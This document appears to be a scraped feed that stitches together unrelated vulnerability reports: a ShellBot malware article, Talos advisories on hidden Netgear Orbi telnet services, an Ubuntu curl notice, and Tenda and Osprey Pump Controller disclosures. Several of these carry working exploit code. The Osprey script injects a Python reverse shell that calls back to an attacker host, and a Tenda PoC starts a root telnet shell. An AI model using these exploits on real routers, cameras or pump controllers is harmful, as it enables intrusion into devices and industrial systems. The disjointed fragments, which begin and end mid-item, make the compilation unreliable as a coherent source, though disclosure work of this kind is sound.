A vulnerability in TOTOLINK CP900 V6.3c.566 allows attackers to start the Telnet service,

CVE-2022-28493

By Deeba Ahmed
As per a report from AhnLab Security Emergency Response Center (ASEC), poorly managed Linux SSH servers are becoming…
This is a post from HackRead.com Read the original post: ShellBot DDoS Malware Targets Linux SSH Servers

As per a report from AhnLab Security Emergency Response Center (ASEC), poorly managed Linux SSH servers are becoming the targets of a new campaign in which different variants of ShellBot malware are being deployed.

**What is meant by Poorly Managed Servers?**

Poorly managed services refer to weak account credentials, which make the server vulnerable to dictionary attacks. Services such as MS-SQL and RDP (remote desktop protocol) are often targeted.

In Linux servers, SSH (secure shell) services are the primary targets. In IoT environments, dictionary attacks are targeted against the Telnet service installed on an embedded Linux OS or an old Linux server.

**What is ShellBot?**

ShellBot, also known as PerIBot, is an old DDoS bot malware developed in Perl. The malware typically uses Internet Relay Chat/IRC protocol to establish communication with its C2 server.

Currently, the malware is being used to launch attacks against insecure Linux systems, targeting servers with weak credentials. It is deployed on a system after attackers use scanner malware to determine whether the system has SSH port 22 open.

**Attack Details**

ASEC researchers noted that ShellBot was used in attacks targeting Linux servers that were distributing cryptocurrency miners through a shell script compiler.

“If ShellBot is installed, Linux servers can be used as DDoS Bots for DDoS attacks against specific targets after receiving a command from the threat actor,” ASEC’s report read.

The attack begins by using a list of SSH credentials to launch a dictionary attack and breach the server. Once this is accomplished, the threat actor deploys the payload and leverages the IRC protocol to communicate with the C2 server and receive commands that instruct ShellBot to conduct DDoS attacks and steal data.

**Different ShellBot Variants Used in the Campaign**

According to ASEC researchers, three variants of ShellBot were identified, including LiGhT’s Modded perlbot v2, DDoS PBot v2.0, and PowerBots (C) GohacK. The first two versions feature a wide range of DDoS attack commands with HTTP, UDP, and TCP protocols.

Conversely, PowerBots are equipped with backdoor-like capabilities that can provide shell access and upload arbitrary files from the infected host. Threat actors can use these backdoor capabilities for the installation of additional malware and launch different types of attacks, abusing the server.

1.  Windows, Linux and macOS Users Hit by APT Group
2.  Multi-platform SysJoker backdoor hits Linux Devices
3.  DDoS Malware ‘Chaos’ Hits Linux and Windows Devices

ShellBot DDoS Malware Targets Linux SSH Servers

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Satellite RBS750 4.6.8.5

**PRODUCT URLS**

Orbi Satellite RBS750 - https://www.netgear.com/support/product/RBS750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Interprocess communications between the router and satellite are often handled using the OpenWRT ubus library. While this is normal, there is a hidden functionality built into the satellite device that allows an attacker with knowlege of the web GUI password (or knowledge of the default password if this was unchanged), to enable and subsequently log into a hidden telnet service.

The initial step in triggering this vulnerability is to get a session using the SHA256 sum of the password with the username ‘admin’:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 217
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"<SHA256 hash of password>","timeout":900}],"jsonrpc":"2.0","id":3}
    

This will return a ‘ubus\_rpc\_session’ token needed to start the hidden telnet service:

    HTTP/1.1 200 OK
    Content-Type: application/json
    Content-Length: 829
    Connection: close
    Date: Mon, 11 Jul 2022 19:27:03 GMT
    Server: lighttpd/1.4.45
    
    {"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}
    

Once this token is retrieved we simply need to add a parameter called ‘telnet\_enable’ to start the service:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 138
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/status.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}
    

**Exploit Proof of Concept**

Using the same password used earlier to generate the SHA256 hash with the username ‘admin’ will allow an attacker to log into the service:

    $ telnet 10.0.0.4
    Trying 10.0.0.4...
    Connected to 10.0.0.4.
    Escape character is '^]'.
    
    login: admin
    Password: === IMPORTANT ============================
     Use 'passwd' to set your login password
     this will disable telnet and enable SSH
    ------------------------------------------
    
    
    BusyBox v1.30.1 () built-in shell (ash)
    
         MM           NM                    MMMMMMM          M       M
       $MMMMM        MMMMM                MMMMMMMMMMM      MMM     MMM
      MMMMMMMM     MM MMMMM.              MMMMM:MMMMMM:   MMMM   MMMMM
    MMMM= MMMMMM  MMM   MMMM       MMMMM   MMMM  MMMMMM   MMMM  MMMMM'
    MMMM=  MMMMM MMMM    MM       MMMMM    MMMM    MMMM   MMMMNMMMMM
    MMMM=   MMMM  MMMMM          MMMMM     MMMM    MMMM   MMMMMMMM
    MMMM=   MMMM   MMMMMM       MMMMM      MMMM    MMMM   MMMMMMMMM
    MMMM=   MMMM     MMMMM,    NMMMMMMMM   MMMM    MMMM   MMMMMMMMMMM
    MMMM=   MMMM      MMMMMM   MMMMMMMM    MMMM    MMMM   MMMM  MMMMMM
    MMMM=   MMMM   MM    MMMM    MMMM      MMMM    MMMM   MMMM    MMMM
    MMMM$ ,MMMMM  MMMMM  MMMM    MMM       MMMM   MMMMM   MMMM    MMMM
      MMMMMMM:      MMMMMMM     M         MMMMMMMMMMMM  MMMMMMM MMMMMMM
        MMMMMM       MMMMN     M           MMMMMMMMM      MMMM    MMMM
         MMMM          M                    MMMMMMM        M       M
           M
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
     ---------------------------------------------------------------
    root@RBS750:/# 
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-36429: TALOS-2022-1597 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Previous to recent hardware and software updates, the Netgear Orbi router series had a hidden debug page containing a toggle switch to enable the telnet service on the device http://<router ip>/debug.htm. However, recent updates have removed this switch and seemingly the ability to enable the service at all. While the switch in the GUI no longer functioned/was removed, enabling the service was still possible by sending a specially-crafted trigger packet to UDP port 23 (https://github.com/bkerler/netgear\_telnet). While recent updates have seemingly broken this tool (and the many tools like it), the service does still exist and is still triggerable.

The newer codebase uses a modified version of the Blowfish algorithm, which appears to be similar to older Nintendo DS cartridge protection code. Specifically the crypt_64bit_up/down functions with the constants 0x12, 0x112, 0x212, and 0x312 in the PoC below.

    def crypt_64bit_up(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0, 0x10):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[-2]
        y = y ^ pArray[-1]
        return (x, y)
    
    def crypt_64bit_down(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0x11, 1, -1):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[1]
        y = y ^ pArray[0]
        return (x, y) 
    

To trigger and enable this service, a username, password and MAC address of the target device’s br-lan interface are required.

**Exploit Proof of Concept**

    $ ./enable_telnet_poc.py
    Plaintext payload:
    00000000: 43 38 39 45 34 33 34 44  45 38 37 38 00 00 00 00  C89E434DE878....
    00000010: 61 64 6D 69 6E 00 00 00  00 00 00 00 00 00 00 00  admin...........
    00000020: 50 61 73 73 77 30 72 64  00 00 00 00 00 00 00 00  Passw0rd........
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    Encrypted payload:
    00000000: D0 9C 30 F6 7D 98 82 EE  8F 14 65 9F B9 03 3C 8D  ..0.}.....e...<.
    00000010: D0 56 6C C4 13 EB 29 43  84 4B BB F5 B1 B0 C5 32  .Vl...)C.K.....2
    00000020: 63 CF 65 A2 BA 4F 87 8F  7C 82 89 28 32 95 7C 64  c.e..O..|..(2.|d
    00000030: 53 20 20 62 E2 F9 4B 3D  7C 82 89 28 32 95 7C 64  S  b..K=|..(2.|d
    00000040: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000050: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000060: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000070: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    
    $ telnet 10.0.0.1
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    Escape character is '^]'.
     === LOGIN ===============================
      Please enter your account and password,
      It's the same with DUT GUI
     ------------------------------------------
    telnet account: admin
    telnet password:
    
    BusyBox v1.30.1 () built-in shell (ash)
    
      .oooooo.             .o8        o8o           .o.       ooooooo  ooooo
     d8P'  `Y8b           "888        `"'          .888.       `8888    d8'
    888      888 oooo d8b  888oooo.  oooo         .8"888.        Y888..8P
    888      888 `888""8P  d88' `88b `888        .8' `888.        `8888'
    888      888  888      888   888  888       .88ooo8888.      .8PY888.
    `88b    d88'  888      888   888  888      .8'     `888.    d8'  `888b
     `Y8bood8P'  d888b     `Y8bod8P' o888o    o88o     o8888o o888o  o88888o
    
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, 10.0.3440.3644)
     ---------------------------------------------------------------
    root@RBR750:/#
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-38452: TALOS-2022-1595 || Cisco Talos Intelligence Group

Ubuntu Security Notice 5964-1 - Harry Sintonen discovered that curl incorrectly handled certain TELNET connection options. Due to lack of proper input scrubbing, curl could pass on user name and telnet options to the server as provided, contrary to expectations. Harry Sintonen discovered that curl incorrectly handled special tilde characters when used with SFTP paths. A remote attacker could possibly use this issue to circumvent filtering.

==========================================================================  
Ubuntu Security Notice USN-5964-1  
March 20, 2023

curl vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in curl.

Software Description:  
- curl: HTTP, HTTPS, and FTP client and client libraries

Details:

Harry Sintonen discovered that curl incorrectly handled certain TELNET  
connection options. Due to lack of proper input scrubbing, curl could pass  
on user name and telnet options to the server as provided, contrary to  
expectations. (CVE-2023-27533)

Harry Sintonen discovered that curl incorrectly handled special tilde  
characters when used with SFTP paths. A remote attacker could possibly use  
this issue to circumvent filtering. (CVE-2023-27534)

Harry Sintonen discovered that curl incorrectly reused certain FTP  
connections. This could lead to the wrong credentials being reused,  
contrary to expectations. (CVE-2023-27535)

Harry Sintonen discovered that curl incorrectly reused connections when the  
GSS delegation option had been changed. This could lead to the option being  
reused, contrary to expectations. (CVE-2023-27536)

Harry Sintonen discovered that curl incorrectly reused certain SSH  
connections. This could lead to the wrong credentials being reused,  
contrary to expectations. (CVE-2023-27538)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   curl                            7.85.0-1ubuntu0.5  
   libcurl3-gnutls                 7.85.0-1ubuntu0.5  
   libcurl3-nss                    7.85.0-1ubuntu0.5  
   libcurl4                        7.85.0-1ubuntu0.5

Ubuntu 22.04 LTS:  
   curl                            7.81.0-1ubuntu1.10  
   libcurl3-gnutls                 7.81.0-1ubuntu1.10  
   libcurl3-nss                    7.81.0-1ubuntu1.10  
   libcurl4                        7.81.0-1ubuntu1.10

Ubuntu 20.04 LTS:  
   curl                            7.68.0-1ubuntu2.18  
   libcurl3-gnutls                 7.68.0-1ubuntu2.18  
   libcurl3-nss                    7.68.0-1ubuntu2.18  
   libcurl4                        7.68.0-1ubuntu2.18

Ubuntu 18.04 LTS:  
   curl                            7.58.0-2ubuntu3.24  
   libcurl3-gnutls                 7.58.0-2ubuntu3.24  
   libcurl3-nss                    7.58.0-2ubuntu3.24  
   libcurl4                        7.58.0-2ubuntu3.24

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5964-1  
   CVE-2023-27533, CVE-2023-27534, CVE-2023-27535, CVE-2023-27536,  
   CVE-2023-27538

Package Information:  
   https://launchpad.net/ubuntu/+source/curl/7.85.0-1ubuntu0.5  
   https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.10  
   https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.18  
   https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.24

Ubuntu Security Notice USN-5964-1

Tenda AX3 V16.03.12.11 was discovered to contain a command injection vulnerability via the lanip parameter at /goform/AdvSetLanip.

**Tenda AX3 V16.03.12.11 command injection vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-3476.html
    

**Affected version**

**Vulnerability details**

In /goform/AdvSetLanip, /goform/telnet, You can set lanip in AdvSetLanip. In the telnet function, the program will get the value of lanip and pass it into the system without any filtering. If the user passes in a malicious command, it will cause a command injection vulnerability.

**Poc**

import requests

url \= "http://192.168.0.1/goform/AdvSetLanip"

lanIp \= ';reboot;'

r \= requests.post(url, data\={'lanIp': lanIp})
print(r.content)

url \= "http://192.168.0.1/goform/telnet"

r \= requests.post(url, data\={'lanIp': lanIp})
print(r.content)

You can see that the router restarts, forming a command injection vulnerability, and finally you can write exp to get root shell

CVE-2023-27240: CVE/readme.md at main · yjzy00001/CVE

Osprey Pump Controller version 1.0.1 unauthenticated remote code execution exploit.

    #!/usr/bin/env python### Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution Exploit### Vendor: ProPump and Controls, Inc.# Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com# Affected version: Software Build ID 20211018, Production 10/18/2021#                   Mirage App: MirageAppManager, Release [1.0.1]#                   Mirage Model 1, RetroBoard II### Summary: Providing pumping systems and automated controls for# golf courses and turf irrigation, municipal water and sewer,# biogas, agricultural, and industrial markets. Osprey: door-mounted,# irrigation and landscape pump controller.## Technology hasn't changed dramatically on pump and electric motors# in the last 30 years. Pump station controls are a different story.# More than ever before, customers expect the smooth and efficient# operation of VFD control. Communications—monitoring, remote control,# and interfacing with irrigation computer programs—have become common# requirements. Fast and reliable accessibility through cell phones# has been a game changer.## ProPump & Controls can handle any of your retrofit needs, from upgrading# an older relay logic system to a powerful modern PLC controller, to# converting your fixed speed or first generation VFD control system to# the latest control platform with communications capabilities.## We use a variety of solutions, from MCI-Flowtronex and Watertronics# package panels to sophisticated SCADA systems capable of controlling# and monitoring networks of hundreds of pump stations, valves, tanks,# deep wells, or remote flow meters.## User friendly system navigation allows quick and easy access to all# critical pump station information with no password protection unless# requested by the customer. Easy to understand control terminology allows# any qualified pump technician the ability to make basic changes without# support. Similar control and navigation platform compared to one of the# most recognized golf pump station control systems for the last twenty# years make it familiar to established golf service groups nationwide.# Reliable push button navigation and LCD information screen allows the# use of all existing control panel door switches to eliminate the common# problems associated with touchscreens.## Global system configuration possibilities allow it to be adapted to# virtually any PLC or relay logic controlled pump stations being used in# the industrial, municipal, agricultural and golf markets that operate# variable or fixed speed. On board Wi-Fi and available cellular modem# option allows complete remote access.## Desc: The controller suffers from an unauthenticated command injection# vulnerability that allows system access with www-data permissions.## ----------------------------------------------------------------------# Triggering command injection...# Trying vector: /DataLogView.php# Operator...?# You got a call from 192.168.3.180:54508# www-data@OspreyController:/var/www/html$ id;pwd# uid=33(www-data) gid=33(www-data) groups=33(www-data)# /var/www/html# www-data@OspreyController:/var/www/html$ exit# Zya!# ----------------------------------------------------------------------## Tested on: Apache/2.4.25 (Raspbian)#            Raspbian GNU/Linux 9 (stretch)#            GNU/Linux 4.14.79-v7+ (armv7l)#            Python 2.7.13 [GCC 6.3.0 20170516]#            GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git#            PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2023-5754# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5754.php### 05.01.2023##                   o    o#                  O    O#                   o    o#                    o    o#_____________________\  /#                      ||#                      ||#                      ||from  time  import   sleepimport pygame.midi   #---#import subprocess    #---#import threading    #-----#import telnetlib    #-----#import requests    #-------#import socket    #-----------#import pygame    #-----------#import random    #-----------#import sys     #---------------#import re     #-----------------####### #      #-----------------#class Pump__it__up:    def __init__(self):        self.sound=False        self.param="eventFileSelected"        self.vector=["/DataLogView.php?"+self.param,                     "/AlarmsView.php?"+self.param,                     "/EventsView.php?"+self.param,                     "/index.php"] # POST        self.payload=None        self.sagent="Tic"        self.rhost=None        self.lhost=None        self.lport=None    def propo(self):        if len(sys.argv)!=4:            self.kako()        else:            self.presh()            self.rhost=sys.argv[1]            self.lhost=sys.argv[2]            self.lport=int(sys.argv[3])            if not "http" in self.rhost:                self.rhost="http://{}".format(self.rhost)    def kako(self):        self.pumpaj()        print("Ovakoj: python {} [RHOST:RPORT] [LHOST] [LPORT]".format(sys.argv[0]))        exit(0)    def pumpaj(self):        titl="""                 .-.                 |  \\                 | / \\             ,___| |  \\            / ___( )   L           '-`   | |   |                 | |   F                 | |  /                 | |                 | |             ____|_|____            [___________]      ,,,,,/,,,,,,,,,,,,,\\,,,,,o-------------------------------------o Osprey Pump Controller RCE Rev Shel_                v1.0j          Ref: ZSL-2023-5754            by lqwrm, 2023o-------------------------------------o        """        print(titl)    def injekcija(self):        self.headers={"Accept":"*/*",                      "Connection":"close",                      "User-Agent":self.sagent,                      "Cache-Control":"max-age=0",                       "Accept-Encoding":"gzip,deflate",                      "Accept-Language":"en-US,en;q=0.9"}            self.payload =";"######################################################"        self.payload+="/usr/bin/python%20-c%20%27import%20socket,subprocess,os;"        self.payload+="s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con"        self.payload+="nect((%22"+self.lhost+"%22,"+str(self.lport)+"));os.dup2"        self.payload+="(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),"        self.payload+="2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27"#######"                print("Triggering command injection...")                for url in self.vector:            if url=="/index.php":                print("Trying vector:",url)                import urllib.parse                self.headers["Content-Type"]="application/x-www-form-urlencoded"                self.postdata={"userName":urllib.parse.unquote(self.payload),                               "pseudonym":"251"}                r=requests.post(self.rhost+url,headers=self.headers,data=self.postdata)                if r.status_code == 200:                    break            else:                print("Trying vector:",url[:-18])                r=requests.get(self.rhost+url+"="+self.payload,headers=self.headers)                print("Code:",r.status_code)                if r.status_code == 200:                    print('Access Granted!')                    break    def netcat(self):        import nclib        server = nclib.TCPServer(("0.0.0.0",int(self.lport)))        print("Operator...?")        server.sock.settimeout(7)        for client in server:            print("You got a call from %s:%d" % client.peer)            command=""            while command!="exit":                if len(command)>0:                    if command in client.readln().decode("utf-8").strip(" "):                        pass                data = client.read_until('$')                print(data.decode("utf-8"), end="")                command = input(" ")                client.writeln(command)            print("Zya!")            exit(1)    def rasplet(self):        if self.sound:            konac1=threading.Thread(name="Pump_Up_The_Jam_1",target=self.entertain)            konac1.start()        konac2=threading.Thread(name="Pump_Up_The_Jam_2",target=self.netcat)        konac2.start()        self.injekcija()    def presh(self):        titl2="""  _______________________________________ /                                       \\|  {###################################}  ||  {##     Osprey Pump Controller    ##}  ||  {##            RCE 0day           ##}  ||  {##                               ##}  ||  {##         ZSL-2023-5754         ##}  ||  {###################################}  ||                                         ||               80  90  100               ||            70     ^      120            ||        60 *      /|\       * 140        ||    55             |              160    ||                   |                     ||                   |                     ||   (O)            (+)              (O)   | \_______________________________________/        """        print(titl2)    def entertain(self):                pygame.midi.init()        midi_output=pygame.midi.Output(0)            notes=[            (74,251),(86,251),(76,251),(88,251),(84,251),(72,251),(69,251),(81,251),            (83,251),(71,251),(67,251),(79,251),(74,251),(62,251),(64,251),(76,251),            (72,251),(60,251),(69,251),(57,251),(59,251),(71,251),(55,251),(67,251),            (62,251),(50,251),(64,251),(52,251),(48,251),(60,251),(57,251),(45,251),            (47,251),(59,251),(45,251),(57,251),(56,251),(44,251),(43,251),(55,251),            (67,251),(43,251),(55,251),(79,251),(71,251),(74,251),(55,251),(59,251),            (62,251),(63,251),(48,251),(64,251),(72,251),(52,251),(55,251),(60,251),            (64,251),(43,251),(55,251),(72,251),(60,251),(64,251),(55,251),(58,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(52,251),(40,251),(72,251),            (76,251),(84,251),(55,251),(60,251),(77,251),(86,251),(74,251),(75,251),            (78,251),(87,251),(79,251),(43,251),(76,251),(88,251),(72,251),(84,251),            (76,251),(60,251),(55,251),(86,251),(74,251),(77,251),(52,251),(88,251),            (79,251),(76,251),(43,251),(83,251),(74,251),(71,251),(86,251),(74,251),            (77,251),(59,251),(53,251),(55,251),(76,251),(84,251),(48,251),(72,251),            (52,251),(55,251),(60,251),(52,251),(55,251),(60,251),(55,251),(59,251),            (62,251),(63,251),(64,251),(48,251),(72,251),(60,251),(52,251),(55,251),            (64,251),(43,251),(55,251),(72,251),(64,251),(55,251),(58,251),(60,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(40,251),(52,251),(72,251),            (51,251),(81,251),(39,251),(69,251),(67,251),(79,251),(72,251),(38,251),            (50,251),(78,251),(66,251),(72,251),(69,251),(81,251),(50,251),(72,251),            (54,251),(57,251),(84,251),(60,251),(76,251),(88,251),(50,251),(74,251),            (86,251),(84,251),(54,251),(57,251),(60,251),(72,251),(69,251),(81,251)]        channel=0        velocity=124        for note, duration in notes:            midi_output.note_on(note, velocity, channel)            duration=59            pygame.time.wait(random.randint(100,301))            pygame.time.wait(duration)            midi_output.note_off(note, velocity, channel)            del midi_output        pygame.midi.quit()    def main(self):        self.propo()        self.rasplet()        exit(1)if __name__=='__main__':    Pump__it__up().main()

Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution

Certain Tenda products are vulnerable to command injection. This affects Tenda CP7 Tenda CP7<=V11.10.00.2211041403 and Tenda CP3 v.10 Tenda CP3 v.10<=V20220906024_2025 and Tenda IT7-PCS Tenda IT7-PCS<=V2209020914 and Tenda IT7-LCS Tenda IT7-LCS<=V2209020914 and Tenda IT7-PRS Tenda IT7-PRS<=V2209020908.

**Information****CVE ID: CVE-2023-23080****Vendor of the products:**

Tenda

**Reported by:**

FeiXincheng(FXC030618@outlook.com) && ShaLetian(ltsha@njupt.edu.cn) from X1cT34m

**Affected products:**

Tenda CP7, Tenda CP3 v.10,Tenda IT7-PCS,Tenda IT7-LCS,Tenda IT7-PRS，Tenda IT7-LRS,Tenda IC7-LRS,Tenda IC7-PRS,Tenda IT6-PCS，Tenda IT6-LCS,Tenda IT6-PRS,Tenda IC6-LRS,Tenda IC6-PRS,Tenda IT6-LRS

**Affected firmware version:**

Tenda CP7<=V11.10.00.2211041403

Tenda CP3 v.10<=V20220906024\_2025

Tenda IT7-PCS<=V2209020914

Tenda IT7-LCS<=V2209020914

Tenda IT7-PRS<=V2209020908

Tenda IT7-LRS<=V2209020908\_0909

Tenda IC7-LRS<=2209020910

Tenda IC7-PRS<=2209020910

Tenda IT6-PCS<=2209020915

Tenda IT6-LCS<=2209020915

Tenda IT6-PRS<=2209020911

Tenda IC6-LRS<=2209020912

Tenda IC6-PRS<=2209020912

Tenda IT6-LRS<=2209020911

**Vendor Homepage:**

https://www.tenda.com.cn/

**Vendor Advisory:**

https://www.tenda.com.cn/product/download/CP7.html

https://www.tenda.com.cn/download/detail-3472.html

https://www.tenda.com.cn/download/detail-3471.html

https://www.tenda.com.cn/download/detail-3470.html

https://www.tenda.com.cn/download/detail-3466.html

https://www.tenda.com.cn/download/detail-3467.html

https://www.tenda.com.cn/download/detail-3463.htmll

https://www.tenda.com.cn/download/detail-3478.html

https://www.tenda.com.cn/download/detail-3469.html

https://www.tenda.com.cn/download/detail-3464.html

https://www.tenda.com.cn/download/detail-3466.html

https://www.tenda.com.cn/download/detail-3461.html

https://www.tenda.com.cn/download/detail-3462.html

https://www.tenda.com.cn/download/detail-3465.html

**Summarize**

Tenda IPC was discovered to contain a command injection vulnerability in port 1300.This vulnerability allows attackers to execute arbitrary commands.

**Vulnerability details**

The vulnerability is in port 1300.

At first, from the startentry enters, and then the sub_11924 function is executed.

In the function sub_11924, we find that we can controll the content, and then we can execute the sub_14404 function.

In the function sub_14404, the content will be passed to sub_16E04.

In the function sub_16E04,we find that dangerous function popen appear. And we can achieve a code excute.

**poc**

for example: python3 exploit.py 192.168.2.106 8888

from time import sleep
import requests
import socket
import sys
import os

if \_\_name\_\_ \== "\_\_main\_\_":
	TARGET\_IP \= sys.argv\[1\]
	SHELL\_PORT \= sys.argv\[2\]

	SHELL\_OPERATION \= "<SYSTEMEX>telnetd -p %s -l /bin/sh &</SYSTEMEX>" % SHELL\_PORT

	print("\\x1b\[01;38;5;214m\[+\] Connect to target ip\\x1b\[0m")
	s \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
	s.connect((TARGET\_IP,1300))
	sleep(0.5)

	print("\[+\] Sending payload to %s ..." % TARGET\_IP)
	s.send(SHELL\_OPERATION.encode())
	
	s.recv(1024)
	sleep(1)
	
	print("\\x1b\[01;38;5;1m\[+\] Successfully connect to Port %s\\x1b\[0m" % SHELL\_PORT)
	os.system("telnet %s %s" % (TARGET\_IP,SHELL\_PORT))
	
	s.close()

**Before attack**

**After attack**

CVE-2023-23080: iot-vul/Tenda/IPC at main · fxc233/iot-vul

Aztech WMB250AC Mesh Routers Firmware Version 016 2020 devices improperly manage sessions, which allows remote attackers to bypass authentication in opportunistic circumstances and execute arbitrary commands with administrator privileges by leveraging an existing web portal login.

**CVE-2022-45600**

CVE URL:

